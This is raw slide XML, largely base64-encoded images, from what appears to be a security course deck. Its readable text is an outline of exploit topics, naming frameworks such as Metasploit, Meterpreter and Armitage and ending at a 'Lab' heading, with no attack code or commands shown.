x7/AHjo11F/YBdhCD5sVqjDBLK0AmOJ8jQdxLWlwv5Ni53JrOqBg1JiXIxcpVVTYJG2kyNaXvbdvOvezRvJ3rfdIe9Kjq8vwOS8DQ+mjwWhxJrXComrWRyOzktLeUeNjN25rUDFVWLxQuyyzRMOVz7Pkaw8m37TrOI5o6TuCiTGoWxtmdPEI5CBHIZGNY8ncGvJs6/kK4ZrGgjbieKfLoZZJJaNjsMcGvc1ga1ud1wbBrdtzu2OvvVq2KMQYBJXwyS0IpnRytYHPby7r5AWt2knm2A2mxsg6NQaYSnHK2jllYKWlo452khrMhc2Iuc6Q9HPdv8AGtr/AE3ByTZ/lEXJPdlbJyjMjnE2Aa++Um+ywK4JrAw98mJYl8nuI4aGjlnitkdJSsEBczxty81x8w+JfXp/JDNJQVDSWYY7D+TpbQGsjiqAXAxckHttJbI25dvb5Cg7nUYpFG9kb5Y2vlvybXPa10gG05Wk3dYeIL6IZQ9oexwc1wDmuBDg5p2ggjYQR0rhtZgIfPo9R1XKPY6Koa9srTBIYjZzWPY17svNsLZt2w+JdwpKZsUbYo2hrI2BjGjc1rRYAeoIPZCEIIUOCshBQNRlV0IKWUZV6IQeeVTZXQgplUPGw8FdUl3KAsrOjgEzjVx1up+q/bU+wfrSfkXYmrilO31dHl5QamoZ6XmvT6eu9r3+/wB2SVWyspXcyymVRZeiEFLIyq6EFLKwUoQQVUhWUFBW3+rqcqsFKCmX/W9FldCDzylXClCAQhCD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9" descr="data:image/jpeg;base64,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334011" y="304800"/>
            <a:ext cx="8200389" cy="6172200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What is an exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Types of exploits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Finding exploits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	Public</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	H@x0r Underground</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploit Frameworks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	Core Impact</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	Immunity Canvas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	Terminology</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	Natural Language Commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Meterpreter</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	Auxiliary modules</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Armitage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714247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2426" y="457201"/>
            <a:ext cx="8181974" cy="1219200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="AutoShape 4" descr="data:image/jpeg;base64,/9j/4AAQSkZJRgABAQAAAQABAAD/2wCEAAkGBhQPEBQPDxAUFBQPEBQQDxUVFRcPFBAQFRgZFBQVFBQXHCgeGBklGhQUIC8gIycpLS0tFR4yNTArNSYrLSkBCQoKDAwOFA4PFDUkHiM1NSkwLSk1LDUuNSw1KTUpNTU2KSs1KSk1Ly8pNTUpKjUpKSstNiw1LCkrNS4sLDIpNf/AABEIALAA6wMBIgACEQEDEQH/xAAcAAACAgMBAQAAAAAAAAAAAAAACAECBQYHAwT/xABMEAABAwICBQULCAgDCQAAAAABAAIDBBEFEgYHITFxEyJBdLMINDVRYXJzgZGxshQXIyUyM1XSFVJTYnWSoeFCQ/BERVRjgqLC0eP/xAAYAQEAAwEAAAAAAAAAAAAAAAAAAQUGBP/EACYRAQAABAUEAgMAAAAAAAAAAAABBAYRQkSBgsECAxITBTEhQVH/2gAMAwEAAhEDEQA/AO4oQhAIQhAIQhAIQhBCpLuV1WTceCgcv+ea/wDsW8ft/wD5LqLdyWNnRwCZ0Ljle719zy8otN8/8fLSfp9HTa97/mMfq39uFKhSu1mQhCEAhCEAhCEAhCEAhCEAoJUrzmbcEA22GxG8bN4QXzKMy1DCYJHVNYx1XUFtJLE2IF7Tma+lY5wdzdvOeXX8dujYsJV6UVAwqaPlyK2lhD5JbDM6HI2WOYNItzw5rN32g8b2oOl3UrzjFha/9/7r0